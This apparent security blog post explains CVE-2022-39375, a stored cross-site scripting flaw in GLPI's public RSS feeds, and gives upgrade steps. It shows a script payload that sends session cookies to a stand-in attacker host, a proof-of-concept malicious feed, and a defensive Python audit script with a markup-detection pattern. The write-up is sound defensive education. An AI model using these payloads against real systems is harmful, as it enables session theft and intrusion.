GLPI, short for *Gestionnaire Libre de Parc Informatique*, is a widely used Free Asset and IT Management Software. It’s favored by many organizations for its rich ITIL Service Desk features, license management, and software audit capabilities. But, like any popular tool, vulnerabilities can be discovered — some with alarming potential.

One such threat is CVE-2022-39375. In this article, we’ll break down what this vulnerability is, how it can be exploited, and, most importantly, what you need to do to stay safe.

What is CVE-2022-39375?

Disclosed in late 2022, CVE-2022-39375 affects GLPI versions prior to 10.0.4. The issue lies in the way GLPI lets users create public RSS feeds. The system doesn't properly sanitize input, allowing attackers to inject *malicious code* that can get executed on the dashboards of other users who view the infected feed.

In short:  
An attacker can create an RSS feed containing harmful content. When another GLPI user, perhaps an admin, adds this feed to their dashboard, the attacker’s code runs in their browser—potentially leaking sensitive info or taking control of the session.

How Does the Exploit Work?

The core problem is insufficient input sanitization. When users create a public RSS feed, certain fields (like the title or description) can contain unexpected HTML or JavaScript.

When the dashboard loads, the code executes inside the victim’s browser.

Typical Payload Example:

An attacker might use a payload like:

```html
<title>Breaking News<script>fetch('https://evil.example.com/steal?cookie=' + document.cookie)</script></title>
```

If this gets rendered without filtering on a dashboard, the <script> tag runs, stealing the victim’s session cookie.

1. Let’s say you can edit the RSS feed as a user:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
  <channel>
    <title>Malicious <script>alert('XSS in GLPI!')</script> Feed</title>
    <description>This feed will pop alert()</description>
    <link>http://glpi.example.com/</link>
    <item>
      <title>Something bad happened</title>
      <description>Testing</description>
      <link>http://glpi.example.com/item</link>
    </item>
  </channel>
</rss>
```

2. User Adds Feed to Dashboard

When this feed is added to any GLPI dashboard, the dashboard’s code will execute any `<script>` embedded in the feed if unpatched.
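As an added defender-side example (not code from this post or from GLPI itself), the Python below parses a constructed copy of the feed above, contrasts the vulnerable rendering pattern with an escaped one, and flags feed fields that carry markup so dashboards can be reviewed after the upgrade. The feed text and the function names are assumptions; the feed delivers the title via CDATA, which is how HTML in a feed field normally arrives and parses to the same raw string as the inline form shown above.

```python
import html
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample feed (not captured from a real GLPI instance). The post shows
# the <script> tag inline; a feed delivers HTML in a field via CDATA, which the XML
# parser turns into the same raw string.
MALICIOUS_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title><![CDATA[Malicious <script>alert('XSS in GLPI!')</script> Feed]]></title>
    <description>This feed will pop alert()</description>
    <link>http://glpi.example.com/</link>
    <item>
      <title>Something bad happened</title>
      <description>Testing</description>
      <link>http://glpi.example.com/item</link>
    </item>
  </channel>
</rss>"""


def feed_fields(xml_text: str) -> List[Dict[str, str]]:
    """Raw title/description of the channel (entry 0) and of each item."""
    channel = ET.fromstring(xml_text).find("channel")
    entries = [channel] + channel.findall("item")
    return [{"title": e.findtext("title") or "",
             "description": e.findtext("description") or ""} for e in entries]


def render_unsafe(field: str) -> str:
    # Vulnerable pattern: feed text concatenated straight into the dashboard HTML.
    return f"<div class='feed-title'>{field}</div>"


def render_safe(field: str) -> str:
    # Fixed pattern: escape first, so any markup in the feed becomes inert text.
    return f"<div class='feed-title'>{html.escape(field, quote=True)}</div>"


# Tags, javascript: URLs and inline event handlers have no business in a feed title.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript:|\bon[a-z]+\s*=", re.I)


def audit_feed(xml_text: str) -> List[str]:
    """List feed fields carrying markup, for the post-upgrade dashboard review."""
    findings = []
    for i, entry in enumerate(feed_fields(xml_text)):
        for name, value in entry.items():
            if MARKUP_RE.search(value):
                findings.append(f"entry {i} {name}: {value[:60]!r}")
    return findings
```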

One of the possible consequences is spreading further malware internally from the compromised session. For IT teams who rely on GLPI to manage critical infrastructure, the risks can be severe.

How to Fix

The GLPI team has patched this vulnerability in version 10.0.4. You should upgrade immediately, as there is no known workaround or mitigation.

1. Back up your GLPI data.
2. Download the latest version (10.0.4 or newer).
3. Follow the official upgrade instructions.
4. Double-check all dashboards for unfamiliar RSS feeds after the upgrade.

Important: Just removing suspicious feeds or users is not enough. The root issue is the missing sanitization of feed content before it is rendered, which is only fixed in 10.0.4+.

References

- Official GLPI Security Advisory
- NVD – National Vulnerability Database Entry
- GLPI Releases on GitHub

Conclusion

*CVE-2022-39375* exposed GLPI users to a serious dashboard code injection vector. If you’re using GLPI, prioritize upgrading to version 10.0.4 or later right away. There’s no other way to stay secure. IT management tools are a juicy target—don’t let your organization be the next victim of a simple but damaging bug.

Stay secure—patch fast! If you have questions about this exploit, read the advisory or ask in the official GLPI forums.


*This write-up was made exclusively for educational awareness. Don’t exploit systems you don’t have permission to test. Always report bugs responsibly and help build a safer digital world.*

Timeline

Published on: 11/03/2022 16:15:00 UTC
Last modified on: 11/03/2022 19:04:00 UTC